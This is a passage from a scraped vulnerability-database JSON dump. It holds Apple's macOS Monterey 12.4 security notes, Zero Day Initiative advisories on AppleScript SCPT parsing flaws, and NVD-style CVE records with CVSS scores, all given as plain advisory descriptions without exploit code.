Bugzilla: 238178 \nCVE-2022-26700: ryuzaki\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 236950 \nCVE-2022-26709: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab\n\nWebKit Bugzilla: 237475 \nCVE-2022-26710: Chijin Zhou of ShuiMuYuLin Ltd and Tsinghua wingtecher lab\n\nWebKit Bugzilla: 238171 \nCVE-2022-26717: Jeonghoon Shin of Theori\n\n**WebKit**\n\nAvailable for: macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nWebKit Bugzilla: 238183 \nCVE-2022-26716: SorryMybad (@S0rryMybad) of Kunlun Lab\n\nWebKit Bugzilla: 238699 \nCVE-2022-26719: Dongzhuo Zhao working with ADLab of Venustech\n\n**WebRTC**\n\nAvailable for: macOS Monterey\n\nImpact: Video self-preview in a webRTC call may be interrupted if the user answers a phone call\n\nDescription: A logic issue in the handling of concurrent media was addressed with improved state handling.\n\nWebKit Bugzilla: 237524 \nCVE-2022-22677: an anonymous researcher\n\n**Wi-Fi**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may disclose restricted memory\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-26745: Scarlet Raine\n\nEntry updated July 6, 2022\n\n**Wi-Fi**\n\nAvailable for: macOS Monterey\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2022-26761: Wang Yu of Cyberserval\n\n**Wi-Fi**\n\nAvailable for: macOS Monterey\n\nImpact: A malicious application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2022-26762: Wang Yu of Cyberserval\n\n**zip**\n\nAvailable for: macOS Monterey\n\nImpact: Processing a maliciously crafted file may lead to a denial of service\n\nDescription: A denial of service issue was addressed with improved state handling.\n\nCVE-2022-0530\n\n**zlib**\n\nAvailable for: macOS Monterey\n\nImpact: An attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-25032: Tavis Ormandy\n\n**zsh**\n\nAvailable for: macOS Monterey\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: This issue was addressed by updating to zsh version 5.8.1.\n\nCVE-2021-45444\n\n\n\n## Additional recognition\n\n**AppleMobileFileIntegrity**\n\nWe would like to acknowledge Wojciech Regu\u0142a (@_r3ggi) of SecuRing for their assistance.\n\n**Bluetooth**\n\nWe would like to acknowledge Jann Horn of Project Zero for their assistance.\n\n**Calendar**\n\nWe would like to acknowledge Eugene Lim of Government Technology Agency of Singapore for their assistance.\n\n**FaceTime**\n\nWe would like to acknowledge Wojciech Regu\u0142a (@_r3ggi) of SecuRing for their assistance.\n\n**FileVault**\n\nWe would like to acknowledge Benjamin Adolphi of Promon Germany GmbH for their assistance.\n\n**Login Window**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.\n\n**Photo Booth**\n\nWe would like to acknowledge Wojciech Regu\u0142a (@_r3ggi) of SecuRing for their assistance.\n\n**System Preferences**\n\nWe would like to acknowledge Mohammad Tausif Siddiqui (@toshsiddiqui) and an anonymous researcher for their assistance.\n\nEntry updated May 25, 2022 \n\n**WebKit**\n\nWe would like to acknowledge James Lee and an anonymous researcher for their assistance.\n\nEntry updated May 25, 2022 \n\n**Wi-Fi**\n\nWe would like to acknowledge Dana Morrison for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: May 11, 2023\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T00:00:00", "type": "apple", "title": "About the security content of macOS Monterey 12.4", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-25032", "CVE-2021-44224", "CVE-2021-44790", "CVE-2021-45444", "CVE-2022-0530", "CVE-2022-0778", "CVE-2022-22617", "CVE-2022-22677", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-23308", "CVE-2022-26693", "CVE-2022-26694", "CVE-2022-26696", "CVE-2022-26697", "CVE-2022-26698", "CVE-2022-26700", "CVE-2022-26701", "CVE-2022-26704", "CVE-2022-26706", "CVE-2022-26707", "CVE-2022-26708", "CVE-2022-26709", "CVE-2022-26710", "CVE-2022-26711", "CVE-2022-26712", "CVE-2022-26714", "CVE-2022-26715", "CVE-2022-26716", "CVE-2022-26717", "CVE-2022-26718", "CVE-2022-26719", "CVE-2022-26720", "CVE-2022-26721", "CVE-2022-26722", "CVE-2022-26723", "CVE-2022-26725", "CVE-2022-26726", "CVE-2022-26727", "CVE-2022-26728", "CVE-2022-26731", "CVE-2022-26736", "CVE-2022-26737", "CVE-2022-26738", "CVE-2022-26739", "CVE-2022-26740", "CVE-2022-26741", "CVE-2022-26742", "CVE-2022-26743", "CVE-2022-26745", "CVE-2022-26746", "CVE-2022-26748", "CVE-2022-26749", "CVE-2022-26750", "CVE-2022-26751", "CVE-2022-26752", "CVE-2022-26753", "CVE-2022-26754", "CVE-2022-26755", "CVE-2022-26756", "CVE-2022-26757", "CVE-2022-26761", "CVE-2022-26762", "CVE-2022-26763", "CVE-2022-26764", "CVE-2022-26765", "CVE-2022-26766", "CVE-2022-26767", "CVE-2022-26768", "CVE-2022-26769", "CVE-2022-26770", "CVE-2022-26772", "CVE-2022-26775", "CVE-2022-26776", "CVE-2022-32781", "CVE-2022-32782", "CVE-2022-32783", "CVE-2022-32790", "CVE-2022-32794", "CVE-2022-32882"], "modified": "2022-05-16T00:00:00", "id": "APPLE:E82A2A3D978FD519CBF58A36F587B070", "href": "https://support.apple.com/kb/HT213257", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2023-06-14T14:32:58", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AppleScript framework. Crafted data in a SCPT file can trigger a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-28T00:00:00", "type": "zdi", "title": "Apple macOS SCPT File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22597"], "modified": "2022-05-11T00:00:00", "id": "ZDI-22-757", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-757/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T14:33:19", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AppleScript framework. Crafted data in a SCPT file can trigger a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2022-04-28T00:00:00", "type": "zdi", "title": "Apple macOS SCPT File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22625"], "modified": "2022-04-28T00:00:00", "id": "ZDI-22-712", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-712/", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-06-14T14:33:17", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AppleScript framework. Crafted data in a SCPT file can trigger a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-28T00:00:00", "type": "zdi", "title": "Apple macOS SCPT File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22648"], "modified": "2022-04-28T00:00:00", "id": "ZDI-22-715", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-715/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-14T14:33:19", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AppleScript framework. Crafted data in a SCPT file can trigger a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-28T00:00:00", "type": "zdi", "title": "Apple macOS SCPT File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22648"], "modified": "2022-04-28T00:00:00", "id": "ZDI-22-713", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-713/", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-14T14:33:20", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AppleScript framework. Crafted data in a SCPT file can trigger a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2022-04-28T00:00:00", "type": "zdi", "title": "Apple macOS SCPT File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22626"], "modified": "2022-04-28T00:00:00", "id": "ZDI-22-711", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-711/", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-06-14T14:33:18", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the AppleScript framework. Crafted data in a SCPT file can trigger a read past the end of an allocated data structure. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2022-04-28T00:00:00", "type": "zdi", "title": "Apple macOS SCPT File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22627"], "modified": "2022-04-28T00:00:00", "id": "ZDI-22-714", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-714/", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}], "prion": [{"lastseen": "2023-08-15T15:50:28", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22631", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22631"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22631", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22631", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T15:50:07", "description": "A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5, macOS Monterey 12.3. A local user may be able to write arbitrary files.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-02-27T20:15:00", "type": "prion", "title": "CVE-2022-22582", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22582"], "modified": "2023-03-07T20:21:00", "id": "PRION:CVE-2022-22582", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22582", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2023-08-15T15:50:59", "description": "An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A local attacker may be able to view the previous logged in user\u2019s desktop from the fast user switching screen.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 3.3, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22656", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22656"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22656", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22656", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-15T15:50:16", "description": "This issue was addressed with improved checks. This issue is fixed in Security Update 2022-003 Catalina, macOS Monterey 12.3, macOS Big Sur 11.6.5. A maliciously crafted ZIP archive may bypass Gatekeeper checks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-05-26T18:15:00", "type": "prion", "title": "CVE-2022-22616", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22616"], "modified": "2023-08-08T14:22:00", "id": "PRION:CVE-2022-22616", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22616", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-15T15:50:11", "description": "A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted file may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22597", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22597"], "modified": "2022-03-25T19:49:00", "id": "PRION:CVE-2022-22597", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22597", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T15:50:21", "description": "An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22625", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22625"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22625", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22625", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-08-15T15:50:15", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T18:15:00", "type": "prion", "title": "CVE-2022-22613", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22613"], "modified": "2022-11-02T13:18:00", "id": "PRION:CVE-2022-22613", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-22613", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-15T15:50:58", "description": "This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A plug-in may be able to inherit the application's permissions and access user data.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": 